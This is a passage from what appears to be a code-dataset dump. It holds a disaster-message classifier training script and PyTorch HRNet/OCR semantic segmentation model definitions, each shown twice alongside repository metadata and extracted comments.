return np.array(ret)
@staticmethod
def mat2euler(M, cy_thresh=None):
M = np.asarray(M)
if cy_thresh is None:
try:
cy_thresh = np.finfo(M.dtype).eps * 4
except ValueError:
cy_thresh = np.finfo(float).eps * 4.0
r11, r12, r13, r21, r22, r23, r31, r32, r33 = M.flat
cy = math.sqrt(r33 * r33 + r23 * r23)
if cy > cy_thresh:
z = math.atan2(-r12, r11)
y = math.atan2(r13, cy)
x = math.atan2(-r23, r33)
else:
z = math.atan2(r21, r22)
y = math.atan2(r13, cy)
x = 0.0
return x, y, z
| none | 1 | 2.581553 | 3 | |
models/train_classifier.py | rojandhimal/Disaster_Response_Pipelines | 1 | 6617371 | <reponame>rojandhimal/Disaster_Response_Pipelines<filename>models/train_classifier.py
# import libraries
import nltk
import numpy as np
import sqlite3
nltk.download(['punkt', 'wordnet'])
from nltk.tokenize import word_tokenize, RegexpTokenizer
from nltk.stem import WordNetLemmatizer
import pandas as pd
from sqlalchemy import create_engine
import re
from sklearn.pipeline import Pipeline
from sklearn.ensemble import RandomForestClassifier
from sklearn.multioutput import MultiOutputClassifier
from sklearn.model_selection import train_test_split, GridSearchCV
from sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer
from sklearn.metrics import precision_recall_fscore_support, classification_report
from sklearn.tree import DecisionTreeClassifier
import pickle
import os
import sys
def load_data(database_filepath):
"""
This function load data from database from given database_filepath.
process and slit the data as label and features (x ,y, categoory_name)
Input args:
Database file path
Output :
returnd seperated feature and labels (X,y,categoory_name)
"""
table_name = "Disaster"
engine = create_engine(f"sqlite:///{database_filepath}")
df = pd.read_sql_table(table_name,engine)
# drop columns with null
df = df[~(df.isnull().any(axis=1))|((df.original.isnull())&~(df.offer.isnull()))]
X = df['message']
y = df.iloc[:, 4:]
category_names = list(df.columns[4:])
return X,y,category_names
def tokenize(text):
"""
This function take text and return token of words
Input args:
Text
Output:
List of clean token
"""
url_regex = 'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+'
detected_urls = re.findall(url_regex, text)
for url in detected_urls:
text = text.replace(url, "urlplaceholder")
tokens = word_tokenize(text)
lemmatizer = WordNetLemmatizer()
clean_tokens = []
for tok in tokens:
clean_tok = lemmatizer.lemmatize(tok).lower().strip()
clean_tokens.append(clean_tok)
return clean_tokens
def build_model():
"""
Build Multiclass Randomforest model
Create pipeline
Hypertune model
Input :
N/A
Output:
returns Hypertuned model
"""
pipeline = Pipeline([
('vect', CountVectorizer(tokenizer=tokenize)),
('tfidf', TfidfTransformer()),
('clf', MultiOutputClassifier(RandomForestClassifier()))
])
parameters = {'clf__estimator__max_depth': [10, 50, None],
'clf__estimator__min_samples_leaf':[2, 5, 10]}
cv = GridSearchCV(pipeline, param_grid=parameters)
return cv
def evaluate_model(model, X_test, Y_test, category_names):
'''
This function evaluate the model and return the classification and accurancy score.
Inputs: Model, X_test, y_test, Catgegory_names
Outputs: Prints the Classification report & Accuracy Score
'''
Y_pred = model.predict(X_test)
# print scores
print(classification_report(Y_test.iloc[:,1:].values, np.array([x[1:] for x in Y_pred]),
target_names=category_names))
def save_model(model, model_filepath):
'''
Function to save the model
Input: model and the file path to save the model
Output: save the model as pickle file in the give filepath
'''
pickle.dump(model, open(model_filepath, 'wb'))
def main():
if len(sys.argv) == 3:
database_filepath, model_filepath = sys.argv[1:]
print('Loading data...\n DATABASE: {}'.format(database_filepath))
X, Y, category_names = load_data(database_filepath)
X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.2)
print('Building model...')
model = build_model()
print('Training model...')
model.fit(X_train.as_matrix(), Y_train.as_matrix())
print('Evaluating model...')
evaluate_model(model, X_test, Y_test, category_names)
###WILL NEED TO CXLEAN THIS UP
print('TYPE OF MODEL')
print(type(model))
print('Saving model...\n MODEL: {}'.format(model_filepath))
save_model(model, model_filepath)
print('Trained model saved!')
else:
print('Please provide the filepath of the disaster messages database '\
'as the first argument and the filepath of the pickle file to '\
'save the model to as the second argument. \n\nExample: python '\
'train_classifier.py ../data/DisasterResponse.db classifier.pkl')
if __name__ == '__main__':
main() | # import libraries
import nltk
import numpy as np
import sqlite3
nltk.download(['punkt', 'wordnet'])
from nltk.tokenize import word_tokenize, RegexpTokenizer
from nltk.stem import WordNetLemmatizer
import pandas as pd
from sqlalchemy import create_engine
import re
from sklearn.pipeline import Pipeline
from sklearn.ensemble import RandomForestClassifier
from sklearn.multioutput import MultiOutputClassifier
from sklearn.model_selection import train_test_split, GridSearchCV
from sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer
from sklearn.metrics import precision_recall_fscore_support, classification_report
from sklearn.tree import DecisionTreeClassifier
import pickle
import os
import sys
def load_data(database_filepath):
"""
This function load data from database from given database_filepath.
process and slit the data as label and features (x ,y, categoory_name)
Input args:
Database file path
Output :
returnd seperated feature and labels (X,y,categoory_name)
"""
table_name = "Disaster"
engine = create_engine(f"sqlite:///{database_filepath}")
df = pd.read_sql_table(table_name,engine)
# drop columns with null
df = df[~(df.isnull().any(axis=1))|((df.original.isnull())&~(df.offer.isnull()))]
X = df['message']
y = df.iloc[:, 4:]
category_names = list(df.columns[4:])
return X,y,category_names
def tokenize(text):
"""
This function take text and return token of words
Input args:
Text
Output:
List of clean token
"""
url_regex = 'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+'
detected_urls = re.findall(url_regex, text)
for url in detected_urls:
text = text.replace(url, "urlplaceholder")
tokens = word_tokenize(text)
lemmatizer = WordNetLemmatizer()
clean_tokens = []
for tok in tokens:
clean_tok = lemmatizer.lemmatize(tok).lower().strip()
clean_tokens.append(clean_tok)
return clean_tokens
def build_model():
"""
Build Multiclass Randomforest model
Create pipeline
Hypertune model
Input :
N/A
Output:
returns Hypertuned model
"""
pipeline = Pipeline([
('vect', CountVectorizer(tokenizer=tokenize)),
('tfidf', TfidfTransformer()),
('clf', MultiOutputClassifier(RandomForestClassifier()))
])
parameters = {'clf__estimator__max_depth': [10, 50, None],
'clf__estimator__min_samples_leaf':[2, 5, 10]}
cv = GridSearchCV(pipeline, param_grid=parameters)
return cv
def evaluate_model(model, X_test, Y_test, category_names):
'''
This function evaluate the model and return the classification and accurancy score.
Inputs: Model, X_test, y_test, Catgegory_names
Outputs: Prints the Classification report & Accuracy Score
'''
Y_pred = model.predict(X_test)
# print scores
print(classification_report(Y_test.iloc[:,1:].values, np.array([x[1:] for x in Y_pred]),
target_names=category_names))
def save_model(model, model_filepath):
'''
Function to save the model
Input: model and the file path to save the model
Output: save the model as pickle file in the give filepath
'''
pickle.dump(model, open(model_filepath, 'wb'))
def main():
if len(sys.argv) == 3:
database_filepath, model_filepath = sys.argv[1:]
print('Loading data...\n DATABASE: {}'.format(database_filepath))
X, Y, category_names = load_data(database_filepath)
X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.2)
print('Building model...')
model = build_model()
print('Training model...')
model.fit(X_train.as_matrix(), Y_train.as_matrix())
print('Evaluating model...')
evaluate_model(model, X_test, Y_test, category_names)
###WILL NEED TO CXLEAN THIS UP
print('TYPE OF MODEL')
print(type(model))
print('Saving model...\n MODEL: {}'.format(model_filepath))
save_model(model, model_filepath)
print('Trained model saved!')
else:
print('Please provide the filepath of the disaster messages database '\
'as the first argument and the filepath of the pickle file to '\
'save the model to as the second argument. \n\nExample: python '\
'train_classifier.py ../data/DisasterResponse.db classifier.pkl')
if __name__ == '__main__':
main() | en | 0.688438 | # import libraries This function load data from database from given database_filepath. process and slit the data as label and features (x ,y, categoory_name) Input args: Database file path Output : returnd seperated feature and labels (X,y,categoory_name) # drop columns with null This function take text and return token of words Input args: Text Output: List of clean token Build Multiclass Randomforest model Create pipeline Hypertune model Input : N/A Output: returns Hypertuned model This function evaluate the model and return the classification and accurancy score. Inputs: Model, X_test, y_test, Catgegory_names Outputs: Prints the Classification report & Accuracy Score # print scores Function to save the model Input: model and the file path to save the model Output: save the model as pickle file in the give filepath ###WILL NEED TO CXLEAN THIS UP | 2.839686 | 3 |
seg/lib/models/nets/hrnet.py | Frank-Abagnal/HRFormer | 254 | 6617372 | ##+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
## Created by: RainbowSecret
## Microsoft Research
## <EMAIL>
## Copyright (c) 2018
##
## This source code is licensed under the MIT-style license found in the
## LICENSE file in the root directory of this source tree
##+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
import os
import pdb
import torch
import torch.nn as nn
import torch.nn.functional as F
from lib.models.backbones.backbone_selector import BackboneSelector
from lib.models.tools.module_helper import ModuleHelper
class HRNet_W48(nn.Module):
"""
deep high-resolution representation learning for human pose estimation, CVPR2019
"""
def __init__(self, configer):
super(HRNet_W48, self).__init__()
self.configer = configer
self.num_classes = self.configer.get("data", "num_classes")
self.backbone = BackboneSelector(configer).get_backbone()
# extra added layers
in_channels = 720 # 48 + 96 + 192 + 384
self.cls_head = nn.Sequential(
nn.Conv2d(in_channels, in_channels, kernel_size=3, stride=1, padding=1),
ModuleHelper.BNReLU(
in_channels, bn_type=self.configer.get("network", "bn_type")
),
nn.Dropout2d(0.10),
nn.Conv2d(
in_channels,
self.num_classes,
kernel_size=1,
stride=1,
padding=0,
bias=False,
),
)
def forward(self, x_):
x = self.backbone(x_)
_, _, h, w = x[0].size()
feat1 = x[0]
feat2 = F.interpolate(x[1], size=(h, w), mode="bilinear", align_corners=True)
feat3 = F.interpolate(x[2], size=(h, w), mode="bilinear", align_corners=True)
feat4 = F.interpolate(x[3], size=(h, w), mode="bilinear", align_corners=True)
feats = torch.cat([feat1, feat2, feat3, feat4], 1)
out = self.cls_head(feats)
out = F.interpolate(
out, size=(x_.size(2), x_.size(3)), mode="bilinear", align_corners=True
)
return out
class HRNet_W48_ASPOCR(nn.Module):
def __init__(self, configer):
super(HRNet_W48_ASPOCR, self).__init__()
self.configer = configer
self.num_classes = self.configer.get("data", "num_classes")
self.backbone = BackboneSelector(configer).get_backbone()
# extra added layers
in_channels = 720 # 48 + 96 + 192 + 384
from lib.models.modules.spatial_ocr_block import SpatialOCR_ASP_Module
self.asp_ocr_head = SpatialOCR_ASP_Module(
features=720,
hidden_features=256,
out_features=256,
dilations=(24, 48, 72),
num_classes=self.num_classes,
bn_type=self.configer.get("network", "bn_type"),
)
self.cls_head = nn.Conv2d(
256, self.num_classes, kernel_size=1, stride=1, padding=0, bias=False
)
self.aux_head = nn.Sequential(
nn.Conv2d(in_channels, 512, kernel_size=3, stride=1, padding=1),
ModuleHelper.BNReLU(512, bn_type=self.configer.get("network", "bn_type")),
nn.Conv2d(
512, self.num_classes, kernel_size=1, stride=1, padding=0, bias=False
),
)
def forward(self, x_):
x = self.backbone(x_)
_, _, h, w = x[0].size()
feat1 = x[0]
feat2 = F.interpolate(x[1], size=(h, w), mode="bilinear", align_corners=True)
feat3 = F.interpolate(x[2], size=(h, w), mode="bilinear", align_corners=True)
feat4 = F.interpolate(x[3], size=(h, w), mode="bilinear", align_corners=True)
feats = torch.cat([feat1, feat2, feat3, feat4], 1)
out_aux = self.aux_head(feats)
feats = self.asp_ocr_head(feats, out_aux)
out = self.cls_head(feats)
out_aux = F.interpolate(
out_aux, size=(x_.size(2), x_.size(3)), mode="bilinear", align_corners=True
)
out = F.interpolate(
out, size=(x_.size(2), x_.size(3)), mode="bilinear", align_corners=True
)
return out_aux, out
class HRNet_W48_OCR(nn.Module):
def __init__(self, configer):
super(HRNet_W48_OCR, self).__init__()
self.configer = configer
self.num_classes = self.configer.get("data", "num_classes")
self.backbone = BackboneSelector(configer).get_backbone()
in_channels = 720
self.conv3x3 = nn.Sequential(
nn.Conv2d(in_channels, 512, kernel_size=3, stride=1, padding=1),
ModuleHelper.BNReLU(512, bn_type=self.configer.get("network", "bn_type")),
)
from lib.models.modules.spatial_ocr_block import SpatialGather_Module
self.ocr_gather_head = SpatialGather_Module(self.num_classes)
from lib.models.modules.spatial_ocr_block import SpatialOCR_Module
self.ocr_distri_head = SpatialOCR_Module(
in_channels=512,
key_channels=256,
out_channels=512,
scale=1,
dropout=0.05,
bn_type=self.configer.get("network", "bn_type"),
)
self.cls_head = nn.Conv2d(
512, self.num_classes, kernel_size=1, stride=1, padding=0, bias=True
)
self.aux_head = nn.Sequential(
nn.Conv2d(in_channels, in_channels, kernel_size=3, stride=1, padding=1),
ModuleHelper.BNReLU(
in_channels, bn_type=self.configer.get("network", "bn_type")
),
nn.Conv2d(
in_channels,
self.num_classes,
kernel_size=1,
stride=1,
padding=0,
bias=True,
),
)
def forward(self, x_):
x = self.backbone(x_)
_, _, h, w = x[0].size()
feat1 = x[0]
feat2 = F.interpolate(x[1], size=(h, w), mode="bilinear", align_corners=True)
feat3 = F.interpolate(x[2], size=(h, w), mode="bilinear", align_corners=True)
feat4 = F.interpolate(x[3], size=(h, w), mode="bilinear", align_corners=True)
feats = torch.cat([feat1, feat2, feat3, feat4], 1)
out_aux = self.aux_head(feats)
feats = self.conv3x3(feats)
context = self.ocr_gather_head(feats, out_aux)
feats = self.ocr_distri_head(feats, context)
out = self.cls_head(feats)
out_aux = F.interpolate(
out_aux, size=(x_.size(2), x_.size(3)), mode="bilinear", align_corners=True
)
out = F.interpolate(
out, size=(x_.size(2), x_.size(3)), mode="bilinear", align_corners=True
)
return out_aux, out
class HRNet_W48_OCR_B(nn.Module):
"""
Considering that the 3x3 convolution on the 4x resolution feature map is expensive,
we can decrease the intermediate channels from 512 to 256 w/o performance loss.
"""
def __init__(self, configer):
super(HRNet_W48_OCR_B, self).__init__()
self.configer = configer
self.num_classes = self.configer.get("data", "num_classes")
self.backbone = BackboneSelector(configer).get_backbone()
in_channels = 720 # 48 + 96 + 192 + 384
self.conv3x3 = nn.Sequential(
nn.Conv2d(in_channels, 256, kernel_size=3, stride=1, padding=1),
ModuleHelper.BNReLU(256, bn_type=self.configer.get("network", "bn_type")),
)
from lib.models.modules.spatial_ocr_block import SpatialGather_Module
self.ocr_gather_head = SpatialGather_Module(self.num_classes)
from lib.models.modules.spatial_ocr_block import SpatialOCR_Module
self.ocr_distri_head = SpatialOCR_Module(
in_channels=256,
key_channels=128,
out_channels=256,
scale=1,
dropout=0.05,
bn_type=self.configer.get("network", "bn_type"),
)
self.cls_head = nn.Conv2d(
256, self.num_classes, kernel_size=1, stride=1, padding=0, bias=True
)
self.aux_head = nn.Sequential(
nn.Conv2d(in_channels, 256, kernel_size=3, stride=1, padding=1),
ModuleHelper.BNReLU(256, bn_type=self.configer.get("network", "bn_type")),
nn.Conv2d(
256, self.num_classes, kernel_size=1, stride=1, padding=0, bias=True
),
)
def forward(self, x_):
x = self.backbone(x_)
_, _, h, w = x[0].size()
feat1 = x[0]
feat2 = F.interpolate(x[1], size=(h, w), mode="bilinear", align_corners=True)
feat3 = F.interpolate(x[2], size=(h, w), mode="bilinear", align_corners=True)
feat4 = F.interpolate(x[3], size=(h, w), mode="bilinear", align_corners=True)
feats = torch.cat([feat1, feat2, feat3, feat4], 1)
out_aux = self.aux_head(feats)
feats = self.conv3x3(feats)
context = self.ocr_gather_head(feats, out_aux)
feats = self.ocr_distri_head(feats, context)
out = self.cls_head(feats)
out_aux = F.interpolate(
out_aux, size=(x_.size(2), x_.size(3)), mode="bilinear", align_corners=True
)
out = F.interpolate(
out, size=(x_.size(2), x_.size(3)), mode="bilinear", align_corners=True
)
return out_aux, out
class HRNet_W48_SegTR(nn.Module):
def __init__(self, configer):
super(HRNet_W48_SegTR, self).__init__()
self.configer = configer
self.num_classes = self.configer.get("data", "num_classes")
self.backbone = BackboneSelector(configer).get_backbone()
in_channels = 720
self.conv3x3 = nn.Sequential(
nn.Conv2d(in_channels, 512, kernel_size=3, stride=1, padding=1),
ModuleHelper.BNReLU(512, bn_type=self.configer.get("network", "bn_type")),
)
from lib.models.modules.spatial_ocr_block import SpatialGather_Module
self.ocr_gather_head = SpatialGather_Module(self.num_classes)
from lib.models.modules.spatial_ocr_block import SpatialOCR_Module
self.ocr_distri_head = SpatialOCR_Module(
in_channels=512,
key_channels=256,
out_channels=512,
scale=1,
dropout=0.05,
bn_type=self.configer.get("network", "bn_type"),
)
self.cls_head = nn.Conv2d(
512, self.num_classes, kernel_size=1, stride=1, padding=0, bias=True
)
self.aux_head = nn.Sequential(
nn.Conv2d(in_channels, in_channels, kernel_size=3, stride=1, padding=1),
ModuleHelper.BNReLU(
in_channels, bn_type=self.configer.get("network", "bn_type")
),
nn.Conv2d(
in_channels,
self.num_classes,
kernel_size=1,
stride=1,
padding=0,
bias=True,
),
)
self.local_attn = LocalAttention(
in_channels=512,
embed_dim=256,
down_factor=[8, 8],
rpe=False,
norm_layer=ModuleHelper.BatchNorm2d(
bn_type=self.configer.get("network", "bn_type")
),
)
def forward(self, x_):
x = self.backbone(x_)
_, _, h, w = x[0].size()
feat1 = x[0]
feat2 = F.interpolate(x[1], size=(h, w), mode="bilinear", align_corners=True)
feat3 = F.interpolate(x[2], size=(h, w), mode="bilinear", align_corners=True)
feat4 = F.interpolate(x[3], size=(h, w), mode="bilinear", align_corners=True)
feats = torch.cat([feat1, feat2, feat3, feat4], 1)
out_aux = self.aux_head(feats)
feats = self.conv3x3(feats)
# pre- local attention
feats = self.local_attn(feats)
context = self.ocr_gather_head(feats, out_aux)
feats = self.ocr_distri_head(feats, context)
out = self.cls_head(feats)
out_aux = F.interpolate(
out_aux, size=(x_.size(2), x_.size(3)), mode="bilinear", align_corners=True
)
out = F.interpolate(
out, size=(x_.size(2), x_.size(3)), mode="bilinear", align_corners=True
)
return out_aux, out
def _no_grad_trunc_normal_(tensor, mean, std, a, b):
# Cut & paste from PyTorch official master until it's in a few official releases - RW
# Method based on https://people.sc.fsu.edu/~jburkardt/presentations/truncated_normal.pdf
def norm_cdf(x):
# Computes standard normal cumulative distribution function
return (1.0 + math.erf(x / math.sqrt(2.0))) / 2.0
if (mean < a - 2 * std) or (mean > b + 2 * std):
warnings.warn(
"mean is more than 2 std from [a, b] in nn.init.trunc_normal_. "
"The distribution of values may be incorrect.",
stacklevel=2,
)
with torch.no_grad():
# Values are generated by using a truncated uniform distribution and
# then using the inverse CDF for the normal distribution.
# Get upper and lower cdf values
l = norm_cdf((a - mean) / std)
u = norm_cdf((b - mean) / std)
# Uniformly fill tensor with values from [l, u], then translate to
# [2l-1, 2u-1].
tensor.uniform_(2 * l - 1, 2 * u - 1)
# Use inverse cdf transform for normal distribution to get truncated
# standard normal
tensor.erfinv_()
# Transform to proper mean, std
tensor.mul_(std * math.sqrt(2.0))
tensor.add_(mean)
# Clamp to ensure it's in the proper range
tensor.clamp_(min=a, max=b)
return tensor
def trunc_normal_(tensor, mean=0.0, std=1.0, a=-2.0, b=2.0):
return _no_grad_trunc_normal_(tensor, mean, std, a, b)
class HRNet_W48_SegTREmbedding(nn.Module):
def __init__(self, configer):
super(HRNet_W48_SegTREmbedding, self).__init__()
self.configer = configer
self.num_classes = self.configer.get("data", "num_classes")
self.backbone = BackboneSelector(configer).get_backbone()
in_channels = 720
ocr_mid_channels = 512
ocr_key_channels = 256
self.conv3x3 = nn.Sequential(
nn.Conv2d(
in_channels, ocr_mid_channels, kernel_size=3, stride=1, padding=1
),
ModuleHelper.BNReLU(
ocr_mid_channels, bn_type=self.configer.get("network", "bn_type")
),
)
from lib.models.modules.spatial_ocr_block import SpatialGather_Module
self.ocr_gather_head = SpatialGather_Module(self.num_classes)
from lib.models.modules.spatial_ocr_block import SpatialOCR_Module
self.ocr_distri_head = SpatialOCR_Module(
in_channels=ocr_mid_channels,
key_channels=ocr_key_channels,
out_channels=ocr_mid_channels,
scale=1,
dropout=0.05,
bn_type=self.configer.get("network", "bn_type"),
)
self.cls_head = nn.Parameter(torch.zeros(1, ocr_mid_channels, self.num_classes))
trunc_normal_(self.cls_head, std=0.02)
# self.cls_head = nn.Conv2d(512, self.num_classes, kernel_size=1, stride=1, padding=0, bias=True)
self.aux_head_proj = nn.Sequential(
nn.Conv2d(in_channels, in_channels, kernel_size=1, stride=1, padding=0),
ModuleHelper.BNReLU(
in_channels, bn_type=self.configer.get("network", "bn_type")
),
)
self.aux_head = nn.Parameter(torch.zeros(1, in_channels, self.num_classes))
# self.business_layer.append(self.aux_head)
trunc_normal_(self.aux_head, std=0.02)
self.local_attn = LocalAttention(
in_channels=ocr_mid_channels,
embed_dim=ocr_key_channels,
down_factor=[8, 8],
rpe=False,
norm_layer=ModuleHelper.BatchNorm2d(
bn_type=self.configer.get("network", "bn_type")
),
)
def forward(self, x_):
x = self.backbone(x_)
b, _, h, w = x[0].size()
feat1 = x[0]
feat2 = F.interpolate(x[1], size=(h, w), mode="bilinear", align_corners=True)
feat3 = F.interpolate(x[2], size=(h, w), mode="bilinear", align_corners=True)
feat4 = F.interpolate(x[3], size=(h, w), mode="bilinear", align_corners=True)
feats = torch.cat([feat1, feat2, feat3, feat4], 1)
aux_feat = self.aux_head_proj(feats)
out_aux = torch.bmm(
self.aux_head.repeat(b, 1, 1).permute(0, 2, 1), aux_feat.flatten(2)
).view(b, -1, h, w)
# out_aux = self.aux_head(feats)
feats = self.conv3x3(feats)
# pre- local attention
feats = self.local_attn(feats)
context = self.ocr_gather_head(feats, out_aux)
feats = self.ocr_distri_head(feats, context)
out = torch.bmm(
self.cls_head.repeat(b, 1, 1).permute(0, 2, 1), feats.flatten(2)
).view(b, -1, h, w)
out_aux = F.interpolate(
out_aux, size=(x_.size(2), x_.size(3)), mode="bilinear", align_corners=True
)
out = F.interpolate(
out, size=(x_.size(2), x_.size(3)), mode="bilinear", align_corners=True
)
return out_aux, out
| ##+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
## Created by: RainbowSecret
## Microsoft Research
## <EMAIL>
## Copyright (c) 2018
##
## This source code is licensed under the MIT-style license found in the
## LICENSE file in the root directory of this source tree
##+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
import os
import pdb
import torch
import torch.nn as nn
import torch.nn.functional as F
from lib.models.backbones.backbone_selector import BackboneSelector
from lib.models.tools.module_helper import ModuleHelper
class HRNet_W48(nn.Module):
"""
deep high-resolution representation learning for human pose estimation, CVPR2019
"""
def __init__(self, configer):
super(HRNet_W48, self).__init__()
self.configer = configer
self.num_classes = self.configer.get("data", "num_classes")
self.backbone = BackboneSelector(configer).get_backbone()
# extra added layers
in_channels = 720 # 48 + 96 + 192 + 384
self.cls_head = nn.Sequential(
nn.Conv2d(in_channels, in_channels, kernel_size=3, stride=1, padding=1),
ModuleHelper.BNReLU(
in_channels, bn_type=self.configer.get("network", "bn_type")
),
nn.Dropout2d(0.10),
nn.Conv2d(
in_channels,
self.num_classes,
kernel_size=1,
stride=1,
padding=0,
bias=False,
),
)
def forward(self, x_):
x = self.backbone(x_)
_, _, h, w = x[0].size()
feat1 = x[0]
feat2 = F.interpolate(x[1], size=(h, w), mode="bilinear", align_corners=True)
feat3 = F.interpolate(x[2], size=(h, w), mode="bilinear", align_corners=True)
feat4 = F.interpolate(x[3], size=(h, w), mode="bilinear", align_corners=True)
feats = torch.cat([feat1, feat2, feat3, feat4], 1)
out = self.cls_head(feats)
out = F.interpolate(
out, size=(x_.size(2), x_.size(3)), mode="bilinear", align_corners=True
)
return out
class HRNet_W48_ASPOCR(nn.Module):
def __init__(self, configer):
super(HRNet_W48_ASPOCR, self).__init__()
self.configer = configer
self.num_classes = self.configer.get("data", "num_classes")
self.backbone = BackboneSelector(configer).get_backbone()
# extra added layers
in_channels = 720 # 48 + 96 + 192 + 384
from lib.models.modules.spatial_ocr_block import SpatialOCR_ASP_Module
self.asp_ocr_head = SpatialOCR_ASP_Module(
features=720,
hidden_features=256,
out_features=256,
dilations=(24, 48, 72),
num_classes=self.num_classes,
bn_type=self.configer.get("network", "bn_type"),
)
self.cls_head = nn.Conv2d(
256, self.num_classes, kernel_size=1, stride=1, padding=0, bias=False
)
self.aux_head = nn.Sequential(
nn.Conv2d(in_channels, 512, kernel_size=3, stride=1, padding=1),
ModuleHelper.BNReLU(512, bn_type=self.configer.get("network", "bn_type")),
nn.Conv2d(
512, self.num_classes, kernel_size=1, stride=1, padding=0, bias=False
),
)
def forward(self, x_):
x = self.backbone(x_)
_, _, h, w = x[0].size()
feat1 = x[0]
feat2 = F.interpolate(x[1], size=(h, w), mode="bilinear", align_corners=True)
feat3 = F.interpolate(x[2], size=(h, w), mode="bilinear", align_corners=True)
feat4 = F.interpolate(x[3], size=(h, w), mode="bilinear", align_corners=True)
feats = torch.cat([feat1, feat2, feat3, feat4], 1)
out_aux = self.aux_head(feats)
feats = self.asp_ocr_head(feats, out_aux)
out = self.cls_head(feats)
out_aux = F.interpolate(
out_aux, size=(x_.size(2), x_.size(3)), mode="bilinear", align_corners=True
)
out = F.interpolate(
out, size=(x_.size(2), x_.size(3)), mode="bilinear", align_corners=True
)
return out_aux, out
class HRNet_W48_OCR(nn.Module):
def __init__(self, configer):
super(HRNet_W48_OCR, self).__init__()
self.configer = configer
self.num_classes = self.configer.get("data", "num_classes")
self.backbone = BackboneSelector(configer).get_backbone()
in_channels = 720
self.conv3x3 = nn.Sequential(
nn.Conv2d(in_channels, 512, kernel_size=3, stride=1, padding=1),
ModuleHelper.BNReLU(512, bn_type=self.configer.get("network", "bn_type")),
)
from lib.models.modules.spatial_ocr_block import SpatialGather_Module
self.ocr_gather_head = SpatialGather_Module(self.num_classes)
from lib.models.modules.spatial_ocr_block import SpatialOCR_Module
self.ocr_distri_head = SpatialOCR_Module(
in_channels=512,
key_channels=256,
out_channels=512,
scale=1,
dropout=0.05,
bn_type=self.configer.get("network", "bn_type"),
)
self.cls_head = nn.Conv2d(
512, self.num_classes, kernel_size=1, stride=1, padding=0, bias=True
)
self.aux_head = nn.Sequential(
nn.Conv2d(in_channels, in_channels, kernel_size=3, stride=1, padding=1),
ModuleHelper.BNReLU(
in_channels, bn_type=self.configer.get("network", "bn_type")
),
nn.Conv2d(
in_channels,
self.num_classes,
kernel_size=1,
stride=1,
padding=0,
bias=True,
),
)
def forward(self, x_):
x = self.backbone(x_)
_, _, h, w = x[0].size()
feat1 = x[0]
feat2 = F.interpolate(x[1], size=(h, w), mode="bilinear", align_corners=True)
feat3 = F.interpolate(x[2], size=(h, w), mode="bilinear", align_corners=True)
feat4 = F.interpolate(x[3], size=(h, w), mode="bilinear", align_corners=True)
feats = torch.cat([feat1, feat2, feat3, feat4], 1)
out_aux = self.aux_head(feats)
feats = self.conv3x3(feats)
context = self.ocr_gather_head(feats, out_aux)
feats = self.ocr_distri_head(feats, context)
out = self.cls_head(feats)
out_aux = F.interpolate(
out_aux, size=(x_.size(2), x_.size(3)), mode="bilinear", align_corners=True
)
out = F.interpolate(
out, size=(x_.size(2), x_.size(3)), mode="bilinear", align_corners=True
)
return out_aux, out
class HRNet_W48_OCR_B(nn.Module):
"""
Considering that the 3x3 convolution on the 4x resolution feature map is expensive,
we can decrease the intermediate channels from 512 to 256 w/o performance loss.
"""
def __init__(self, configer):
super(HRNet_W48_OCR_B, self).__init__()
self.configer = configer
self.num_classes = self.configer.get("data", "num_classes")
self.backbone = BackboneSelector(configer).get_backbone()
in_channels = 720 # 48 + 96 + 192 + 384
self.conv3x3 = nn.Sequential(
nn.Conv2d(in_channels, 256, kernel_size=3, stride=1, padding=1),
ModuleHelper.BNReLU(256, bn_type=self.configer.get("network", "bn_type")),
)
from lib.models.modules.spatial_ocr_block import SpatialGather_Module
self.ocr_gather_head = SpatialGather_Module(self.num_classes)
from lib.models.modules.spatial_ocr_block import SpatialOCR_Module
self.ocr_distri_head = SpatialOCR_Module(
in_channels=256,
key_channels=128,
out_channels=256,
scale=1,
dropout=0.05,
bn_type=self.configer.get("network", "bn_type"),
)
self.cls_head = nn.Conv2d(
256, self.num_classes, kernel_size=1, stride=1, padding=0, bias=True
)
self.aux_head = nn.Sequential(
nn.Conv2d(in_channels, 256, kernel_size=3, stride=1, padding=1),
ModuleHelper.BNReLU(256, bn_type=self.configer.get("network", "bn_type")),
nn.Conv2d(
256, self.num_classes, kernel_size=1, stride=1, padding=0, bias=True
),
)
def forward(self, x_):
x = self.backbone(x_)
_, _, h, w = x[0].size()
feat1 = x[0]
feat2 = F.interpolate(x[1], size=(h, w), mode="bilinear", align_corners=True)
feat3 = F.interpolate(x[2], size=(h, w), mode="bilinear", align_corners=True)
feat4 = F.interpolate(x[3], size=(h, w), mode="bilinear", align_corners=True)
feats = torch.cat([feat1, feat2, feat3, feat4], 1)
out_aux = self.aux_head(feats)
feats = self.conv3x3(feats)
context = self.ocr_gather_head(feats, out_aux)
feats = self.ocr_distri_head(feats, context)
out = self.cls_head(feats)
out_aux = F.interpolate(
out_aux, size=(x_.size(2), x_.size(3)), mode="bilinear", align_corners=True
)
out = F.interpolate(
out, size=(x_.size(2), x_.size(3)), mode="bilinear", align_corners=True
)
return out_aux, out
class HRNet_W48_SegTR(nn.Module):
def __init__(self, configer):
super(HRNet_W48_SegTR, self).__init__()
self.configer = configer
self.num_classes = self.configer.get("data", "num_classes")
self.backbone = BackboneSelector(configer).get_backbone()
in_channels = 720
self.conv3x3 = nn.Sequential(
nn.Conv2d(in_channels, 512, kernel_size=3, stride=1, padding=1),
ModuleHelper.BNReLU(512, bn_type=self.configer.get("network", "bn_type")),
)
from lib.models.modules.spatial_ocr_block import SpatialGather_Module
self.ocr_gather_head = SpatialGather_Module(self.num_classes)
from lib.models.modules.spatial_ocr_block import SpatialOCR_Module
self.ocr_distri_head = SpatialOCR_Module(
in_channels=512,
key_channels=256,
out_channels=512,
scale=1,
dropout=0.05,
bn_type=self.configer.get("network", "bn_type"),
)
self.cls_head = nn.Conv2d(
